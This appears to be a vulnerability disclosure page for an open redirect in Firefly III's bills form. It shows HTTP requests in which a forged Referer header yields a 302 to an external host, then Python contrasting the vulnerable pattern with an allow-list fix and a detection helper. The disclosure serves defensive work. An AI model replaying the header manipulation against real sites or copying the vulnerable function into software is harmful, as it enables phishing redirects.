Open Redirect in firefly-iii/firefly-iii

Valid

Reported on Oct 1st 2021


Steps:

  1. Log in to the application, navigate to the bills section, create a bill and capture the request.

Web applications use different techniques to redirect users to the next page: a URL query parameter, a header value, JavaScript code, or logic in the backend. In this application, the value of the “Referer” request header was used as the target of the redirect to the next page, so a request whose Referer points to an external site is answered with a 302 to that site.

Original Request:

    POST /bills/store HTTP/1.1
    Host: demo.firefly-iii.org
    ...

Original Response:

    HTTP/1.1 302 Found
    location: https://demo.firefly-iii.org/bills/create
    ...

Modified Request:

    POST /bills/store HTTP/1.1
    Host: demo.firefly-iii.org
    Referer: http://abc.com/
    ...

Modified Response:

    HTTP/1.1 302 Found
    location: http://abc.com/

    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="UTF-8" />
    <meta http-equiv="refresh" content="0;url='http://abc.com/'" />
    <title>Redirecting to http://abc.com/</title>
    </head>
    <body>
    Redirecting to <a href="http://abc.com/">http://abc.com/</a>.
    </body>
    </html>
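The two exchanges above show the whole bug: whatever the Referer header carries is copied into the Location header of the 302. The Python below is an added example, not code from Firefly III or from the fix referenced in the timeline. It places that pattern beside an allow-list check that derives a "back" redirect from Referer without ever leaving the application's own host, plus a small helper for flagging external Location values when reviewing responses or proxy logs. The allow-listed host, the fallback path and all function names are assumptions made for this example; the Location values fed to the helper are the ones shown in the report.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed for this example: the host(s) the application treats as its own
# and the page to fall back to when the Referer cannot be trusted.
ALLOWED_HOSTS = {"demo.firefly-iii.org"}
FALLBACK_PATH = "/bills/create"


def vulnerable_back_target(referer, fallback=FALLBACK_PATH):
    """The pattern shown in the report: the Referer header is copied
    unchanged into the Location header of the 302 response."""
    return referer if referer else fallback


def safe_back_target(referer, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK_PATH):
    """Derive a 'back' redirect from Referer without leaving the site.

    Only an absolute http(s) Referer whose host is on the allow-list is
    accepted, and only its path, query and fragment are reused, so the
    scheme and host of the final Location are never attacker-chosen.
    Everything else collapses to the fallback path.
    """
    if not referer:
        return fallback
    parts = urlsplit(referer.strip())
    # Rejects "javascript:", "data:" and scheme-relative "//host/" values.
    if parts.scheme not in ("http", "https"):
        return fallback
    # urlsplit().hostname strips userinfo and port, so a value such as
    # "http://demo.firefly-iii.org@abc.com/" resolves to "abc.com" here.
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return fallback
    path = parts.path or "/"
    # A path beginning with "//" or "/\" is re-read by browsers as a new
    # authority, which would turn the relative redirect back into an
    # external one, so such paths are refused as well.
    if not path.startswith("/") or path[1:2] in ("/", "\\"):
        return fallback
    return urlunsplit(("", "", path, parts.query, parts.fragment))


def redirect_leaves_site(location, allowed_hosts=ALLOWED_HOSTS):
    """Detection helper for reviewing 3xx responses or proxy logs: True when
    a Location value points away from the allow-listed host(s)."""
    parts = urlsplit(location.strip())
    if not parts.scheme and not parts.netloc:
        return False  # relative URL: stays on the current origin
    return (parts.hostname or "").lower() not in allowed_hosts


if __name__ == "__main__":
    # Location values taken from the two responses in the report.
    for loc in ("https://demo.firefly-iii.org/bills/create", "http://abc.com/"):
        print(loc, "-> external" if redirect_leaves_site(loc) else "-> internal")
    for ref in ("http://abc.com/", "https://demo.firefly-iii.org/bills?page=2", None):
        print(repr(ref), "vulnerable:", vulnerable_back_target(ref),
              "| safe:", safe_back_target(ref))
```

The hardened function returns a relative URL rather than echoing the Referer, so even an allow-listed Referer cannot smuggle a different scheme, port or userinfo into the Location header; when a Referer is absent or untrusted the user simply lands on the fallback page. `redirect_leaves_site` is the check to run over captured 302 responses when confirming that a fix for this class of bug actually holds.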

We have contacted a member of the firefly-iii team and are waiting to hear back 2 months ago
James Cole validated this vulnerability 2 months ago
takester has been awarded the disclosure bounty
The fix bounty is now up for grabs
James Cole confirmed that a fix has been merged on 8662df 2 months ago
James Cole has been awarded the fix bounty
Jamie Slome (Admin), a month ago:

CVE published! 🎊

takester (Researcher), a month ago:

Thanks 🎊